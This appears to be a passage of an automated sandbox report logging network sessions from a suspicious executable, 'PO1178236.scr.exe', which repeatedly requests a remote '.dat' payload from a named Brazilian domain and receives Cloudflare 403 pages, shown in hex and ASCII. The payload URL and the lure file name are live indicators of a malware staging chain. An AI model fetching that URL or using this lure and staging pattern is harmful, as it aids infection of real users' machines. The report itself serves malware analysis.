        Expires: Thu, 09 Jan 2025 07:36:36 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rg5L1I7kGld36hhElqsGe41xm7XvTSua%2BNMcgEyVsvEsZ5LyWAXBFI0OSTFyeV0wz1sutblgDxXut9fmZLNPPiD4gLzuyg4jkyTrHll%2FCNZ2uRCLx1c8BjRVgWOYcJiQkPF2TGCTohWizzUD"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c17f0989f5f4-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1916010&cwnd=103&unsent_bytes=0&cid=4adba2d93a238623&ts=138&x=0"
        2025-01-09 07:36:21 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:21 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:21 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:21 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 37 66 30 39 38 39 66 35 66 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c17f0989f5f4</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:21 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 37 66 30 39 38 39 66 35 66 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c17f0989f5f4',t:'MTczNjQwODE4MS4wMDAwMDA='};var a=d
        2025-01-09 07:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        42192.168.2.949750188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:22 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:22 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:22 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:37 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMsVMC2gAA2rYr%2ByAznmRKKNxkeZyBB9SjXivO32LlGT7F%2FZ2dpHtcJU16qU1tmeH6pCwDozz8eQdZzH8pHCZKWP11dLwOGd8vbN%2BUM%2ByFkEuWUjZsu5EbKGhyeD%2FEhbVFLQVXZR2EZnNMus"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c182ca10de98-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1601&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1803582&cwnd=212&unsent_bytes=0&cid=323162d565e026dd&ts=147&x=0"
        2025-01-09 07:36:22 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:22 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:22 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:22 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 38 32 63 61 31 30 64 65 39 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c182ca10de98</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:22 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 38 32 63 61 31 30 64 65 39 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c182ca10de98',t:'MTczNjQwODE4Mi4wMDAwMDA='};v
        2025-01-09 07:36:22 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        43192.168.2.949751188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:22 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:22 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:22 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:37 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JrsHuef8XcaDJhQtHNn5c%2FuHxqmvHAkiphxRNAMsIb2b0kZJyWwununXFGHaJ5tzGMW7rOLt7LeMibbhSJJTErRBWy75kUs845VnAIXtjUbx6Bi70mDmDc%2FuE8rV8Wdgcvydbnou134gZY6q"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c18689e4438d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1600&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1801357&cwnd=225&unsent_bytes=0&cid=0d33618845d492f2&ts=136&x=0"
        2025-01-09 07:36:22 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:22 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:22 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:22 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 38 36 38 39 65 34 34 33 38 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c18689e4438d</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:22 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 38 36 38 39 65 34 34 33 38 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c18689e4438d',t:'MTczNjQwODE4Mi4wMDAwMDA='};var a=d
        2025-01-09 07:36:22 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        44192.168.2.949752188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:23 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:23 UTC1019INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:23 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:38 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKS%2FipbXysePBu3rV0ehVEgfljaD0OdIrNfNEVg6uaR0NXq38SaWL4uU%2B%2B0h%2F%2FWm2rgOeZfbaRBeUkdVDzsJ5pZpgQbAvIVPw5nMD86WF%2B%2BYvk2owB8yYlqcdf%2FprL%2Bx9pygaTjPYXoMNa%2BP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c18a5a984213-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1624&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1693735&cwnd=231&unsent_bytes=0&cid=4c3e8427a42a1d04&ts=135&x=0"
        2025-01-09 07:36:23 UTC350INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
